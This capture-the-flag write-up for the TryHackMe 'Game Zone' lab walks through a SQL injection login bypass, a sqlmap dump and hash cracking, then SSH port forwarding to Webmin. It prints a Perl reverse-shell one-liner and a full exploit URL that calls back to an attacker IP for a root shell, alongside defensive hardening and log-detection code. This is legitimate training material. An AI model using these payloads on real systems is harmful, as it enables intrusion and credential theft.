Game Zone
Room Link: https://tryhackme.com/room/gamezone
. . .

Introduction

This room covers SQLi (exploiting the vulnerability manually and via SQLMap), cracking users' hashed passwords, using SSH tunnels to reveal a hidden service, and using a Metasploit payload to gain root privileges.

. . .

Scanning & Enumeration

Target IP: 10.10.244.64

Nmap Scan

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 03:52 IST
Nmap scan report for 10.10.244.64
Host is up (0.41s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 61:ea:89:f1:d4:a7:dc:a5:50:f7:6d:89:c3:af:0b:03 (RSA)
|   256 b3:7d:72:46:1e:d3:41:b6:6a:91:15:16:c9:4a:a5:fa (ECDSA)
|_  256 53:67:09:dc:ff:fb:3a:3e:fb:fe:cf:d8:6d:41:27:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Game Zone
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8888/tcp)
HOP RTT       ADDRESS
1   152.33 ms 10.4.0.1
2   ... 3
4   414.32 ms 10.10.244.64
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.91 seconds

As the scan shows, only HTTP and SSH are exposed.

Enumeration

HTTP Enumeration

Landing Page

The guy with the sniper looks like a hitman, but that is still not a confident identification. Let us see if the file name of the image reveals who he is.

Image Path

Let us use Google's reverse image search.

Reverse Image Search

We notice a login screen. Since we know that the room involves SQL injection, we can try SQLi on the login form. My favourite payload is

admin'or'1'='1';--

I set this value for both username and password and wait for the results.

In case you are wondering how to learn more about SQLi, this is a really great resource: Audi-1 SQL Injection Labs.
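To show why that payload logs us in, here is an added illustration (not the room's source code): the vulnerable string-built query beside a parameterized one, with an in-memory sqlite3 table standing in for the room's MySQL backend and a constructed placeholder in place of the real stored hash.

```python
import sqlite3
from typing import Optional

# The payload used on the login form above.
PAYLOAD = "admin'or'1'='1';--"

def make_db() -> sqlite3.Connection:
    # Constructed stand-in for the room's users table (not the real data).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, pwd TEXT)")
    conn.execute("INSERT INTO users VALUES ('agent47', 'constructed-hash')")
    return conn

def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # String concatenation: the quote in the input closes the literal and the
    # rest is parsed as SQL, so the WHERE clause becomes
    #   username='admin' or '1'='1'   (everything after ';--' is a comment)
    sql = ("SELECT username FROM users WHERE username='" + username
           + "' AND pwd='" + password + "'")
    return conn.execute(sql).fetchone() is not None

def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Placeholders pass the input as data; the quote never reaches the SQL parser.
    sql = "SELECT username FROM users WHERE username=? AND pwd=?"
    return conn.execute(sql, (username, password)).fetchone() is not None

def probe_error(conn: sqlite3.Connection, text: str) -> Optional[str]:
    # A lone quote breaks the statement; the error text is the same signal the
    # search page leaks and that sqlmap later keys on.
    try:
        login_vulnerable(conn, text, "x")
    except sqlite3.Error as exc:
        return str(exc)
    return None

def demo() -> dict:
    conn = make_db()
    return {
        "vulnerable_bypassed": login_vulnerable(conn, PAYLOAD, PAYLOAD),
        "parameterized_bypassed": login_parameterized(conn, PAYLOAD, PAYLOAD),
        "error_leaked": probe_error(conn, "'"),
    }

if __name__ == "__main__":
    print(demo())
```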

Search portal after logging in
. . .

Vulnerability Analysis

After a successful login, we see a search portal. Let us try to insert ' here and see what happens.

Error Message after entering ' in input box

We see that a database error message is displayed. We already used SQL injection to bypass authentication, and the error messages here make the injection point even more apparent.

. . .

Exploitation

Looking at the source code of the search form:

Source code of Search Form

We find out that the form sends a POST request and that the input's id is 'searchitem'.

Thus we need to run sqlmap against a POST request.
If you are wondering what sqlmap is, it is an automated SQL injection tool that is very helpful during penetration tests; here is a link.

For POST Request, we got the following blog : https://hackertarget.com/sqlmap-post-request-injection/

Copying those steps …

  1. Set up Burp and intercept the POST request.
Intercepted POST request
  2. Copy this request to a text file; let's call it 'search.txt'.
  3. We can turn off Burp now and run sqlmap with: sqlmap -r search.txt -p searchitem

Directly copy-pasting did not work for me. So I went to HTTP History and then chose 'copy to file'. Once we do that, 'sqlmap -r search.txt -p searchitem' should work.

Found Vulnerable Parameter

We see that the parameter is vulnerable.

Adding --tables gives us a list of all tables in the different databases.

List of tables

This one looks like it has more information.

But before that, I know that we can also try to spawn a shell using --os-shell.

It asks us which programming language the web application uses, which we can check with Wappalyzer.

Wappalyzer output

It supports PHP, but it looks like we do not have write permissions.

Let us see the contents of the database 'db'.

sqlmap -r search.txt -p searchitem -D db --tables
[04:41:22] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[04:41:22] [INFO] fetching tables for database: 'db'
Database: db
[2 tables]
+-------+
| post  |
| users |
+-------+

For ‘post’ we see that there are 5 entries and for users, there is just one.

[04:42:59] [WARNING] no clear password(s) found
Database: db
Table: users
[1 entry]
+------------------------------------------------------------------+----------+
| pwd                                                              | username |
+------------------------------------------------------------------+----------+
| ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47  |
+------------------------------------------------------------------+----------+

Hashed Password: ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14
Username: agent47

Using hash-identifier to identify the hash type

We use hash-identifier to identify the type of hash. Most likely it is SHA-256.

To recover the password, we can use hashcat. The website linked here lists example hashes for all the hash types hashcat can crack.

We see that SHA-256 corresponds to hash mode 1400. The hash mode tells hashcat which hashing algorithm to use; it then runs the wordlist through that algorithm to crack the hash.

An easier option is to just visit this website: https://md5decrypt.net/en/Sha256/#answer
and enter the hash.

Cracked the password

In case we still want to use hashcat, here is how to proceed.

hashcat -m 1400 -a 0 digest.txt /usr/share/wordlists/rockyou.txt
Cracked Password using hashcat
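The reason the hash fell so easily is that it is an unsalted SHA-256 digest of the password. As an added example (not code from the room), the block below applies the length heuristic that hash-identifier uses to the digest found above, maps it to the hashcat mode the writeup used, and contrasts unsalted SHA-256 with salted PBKDF2 storage; the iteration count and the PBKDF2 choice are my assumptions, not anything the room specifies.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple

# The digest recovered from the users table above.
DIGEST = "ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14"

# Hex-length heuristic of the kind hash-identifier applies, with the hashcat
# mode for the unsalted form of each algorithm.
_BY_LENGTH = {32: ("MD5", 0), 40: ("SHA-1", 100),
              64: ("SHA-256", 1400), 128: ("SHA-512", 1700)}

def identify_hash(digest: str) -> Optional[Tuple[str, int]]:
    digest = digest.strip().lower()
    if not digest or any(c not in "0123456789abcdef" for c in digest):
        return None
    return _BY_LENGTH.get(len(digest))

def unsalted_sha256(password: str) -> str:
    # What the room's application stores: a pure function of the password, so
    # one wordlist pass answers for every user and every site using the scheme.
    return hashlib.sha256(password.encode()).hexdigest()

# Hardened alternative: per-user random salt plus a deliberately slow KDF.
# PBKDF2-HMAC-SHA256 is used here because it is in the standard library;
# the iteration count is an assumed value, not a recommendation from the room.
ITERATIONS = 200_000

def store_password(password: str, salt: Optional[bytes] = None) -> str:
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"

def verify_password(password: str, stored: str) -> bool:
    _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    # Constant-time comparison avoids leaking how many bytes matched.
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    print(identify_hash(DIGEST))
    print(unsalted_sha256("example") == unsalted_sha256("example"))
    print(store_password("example") == store_password("example"))
```

Two users with the same password get identical rows under the unsalted scheme but different rows under the salted one, which is what stops a single wordlist run from covering the whole table.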

Now that we have the password, let us try to ssh on the machine using agent47 as username and videogamer124 as the password.

SSH on target machine using the cracked credentials

And we were able to successfully log in.

. . .

Privesc

SSH Port Forwarding
Source: https://tryhackme.com/room/gamezone

Reading this gives us some information about how SSH port forwarding works.

Let us see which sockets are open on the machine.

Local service not exposed on the network

Looking at the TCP sockets, we know 3306 is MySQL, 22 is SSH and 80 is the web server. We do not know what is listening on 10000.

When we try to connect from our machine, the connection is refused, because the service is bound to localhost only. Let's use SSH port forwarding.

ssh -L 10000:localhost:10000 agent47@10.10.244.64

SSH Port Forwarding

Once we have this, let’s check our localhost:10000, and see what exists.

Webmin Landing Page

We see a login portal again. Let’s try to use our ssh credentials here, woooooot! It works.

Webmin Dashboard

Then we search for Webmin on Searchsploit.

Searchsploit search results

We find one Metasploit module. Let's try Google.

webmin exploit search results

The Rapid7 result is essentially the Metasploit module page, and viewing it shows how the module is used to exploit Webmin.

Exploit Module Options

Even Exploit-DB refers to the Metasploit module here.

Exploit Database Page

The best we can do now is look at the code, and try to figure out what this exploit is all about.

Exploit Source Code

This part is mostly metadata. We see the various descriptions being set, and we also notice that it is a remote command execution.

Reading through the exploit suggests that it is an Authenticated Remote Code Execution

We see that it is privileged. We also see the payload option here: it uses cmd/unix payloads written in Perl.

Analysing Exploit Source Code

Next, we see how the checks are done: 1 and 2 check whether we have valid credentials, and 3 and 4 check whether '/file/show.cgi/bin/{something random}' returns a status code of 200. A 200 status means the resource was found on the server, and here it indicates that the version is vulnerable.

Let us see the exploit section. Metasploit gets the username and password and checks if we can successfully authenticate.

Continuing, we see that an encoded payload is stored as 'command', which is then used to send a request to

/file/show.cgi/bin/#{something_random}|#{command}|

If you are thinking like I am, I think we can generate a payload, and manually hit the URL and catch the spawned shell using netcat, otherwise, we have Metasploit at our disposal anyways :P

We can either use msfvenom to build our payload or simply pass a reverse shell command to the server. Let's use the Pentest Monkey reverse shell cheat sheet (link) and copy the Perl reverse shell one-liner.

perl -e 'use Socket;$i="10.4.9.255";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

We need to set our listener IP and port (here 10.4.9.255 and 4444 respectively), start netcat listening on 4444, and use the following format:

/file/show.cgi/bin/<random>|<cmd>|

Running the Exploit

We finally get the root shell! Adding the complete URL here just in case someone is trying…

http://localhost:10000/file/show.cgi/bin/A%7Cperl%20-e%20'use%20Socket;$i=%2210.4.9.255%22;$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(%22tcp%22));if(connect(S,sockaddr_in($p,inet_aton($i))))%7Bopen(STDIN,%22%3E&S%22);open(STDOUT,%22%3E&S%22);open(STDERR,%22%3E&S%22);exec(%22/bin/sh%20-i%22);%7D;'%7C
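From the defender's side, the tell in the request above is a pipe character inside a show.cgi path, which Perl's two-argument open() interprets as "run this command" rather than "open this file". The block below is an added example (not code from the room or from Webmin) that flags such requests in access-log lines; the log lines are constructed in Apache combined-log style, which is an assumption about the format rather than Webmin's actual miniserv log layout.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed sample lines (not taken from the room). Line 2 uses the encoded
# form (%7C) and line 3 a literal pipe; lines 1 and 4 are ordinary requests.
SAMPLE_LOG = """\
10.4.9.255 - agent47 [08/Aug/2020:04:55:01 +0000] "GET /file/show.cgi/etc/hostname HTTP/1.1" 200 21
10.4.9.255 - agent47 [08/Aug/2020:04:55:07 +0000] "GET /file/show.cgi/bin/A%7Cplaceholder-cmd%7C HTTP/1.1" 200 48
10.4.9.255 - agent47 [08/Aug/2020:04:55:09 +0000] "GET /file/show.cgi/bin/A|perl%20-e%20'...'| HTTP/1.1" 200 0
10.4.9.255 - agent47 [08/Aug/2020:04:56:00 +0000] "GET /index.cgi HTTP/1.1" 200 1024
"""

REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

def extract_path(line: str) -> Optional[str]:
    m = REQ_RE.search(line)
    return m.group("path") if m else None

def is_show_cgi_pipe(path: str) -> bool:
    # Decode twice so %7C, %257C and a literal '|' all collapse to the same
    # character before the check. In Perl's two-argument open(), a name ending
    # in '|' is read from a command, which is exactly what /bin/<x>|<cmd>| abuses.
    decoded = unquote(unquote(path))
    return decoded.startswith("/file/show.cgi/") and "|" in decoded

def flag_lines(log: str) -> List[Tuple[int, str]]:
    # Returns (1-based line number, decoded path) for every suspicious request.
    hits = []
    for number, line in enumerate(log.splitlines(), start=1):
        path = extract_path(line)
        if path and is_show_cgi_pipe(path):
            hits.append((number, unquote(unquote(path))))
    return hits

if __name__ == "__main__":
    for number, path in flag_lines(SAMPLE_LOG):
        print(f"line {number}: {path}")
```

A plain file read such as /file/show.cgi/etc/hostname is not flagged, since the check is on the pipe character rather than on show.cgi itself; authenticated use of show.cgi is normal Webmin behaviour.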

I was curious to know what this show.cgi was, so I tried to look for the file on the server as user ‘agent47’

List of files that have show.cgi in their name
Source Code of show.cgi

This suggests that show.cgi can also be used to read any file on the server, and since we are root, we can essentially get everything from the system.

Let us see if we can actually get files on the system.

Contents of /etc/passwd

And we were able to do that.

. . .

Parting Thoughts

Sometimes reading the source code of msf exploit modules helps us use that information to get shells ourselves.
We learned SSH port forwarding and yet another way to privesc!!

I have skipped the PoC for Metasploit, but I have added the steps in a screenshot above.

Feedback is really appreciated. Thank you for reading, and if this helped you in any way, share it with others :)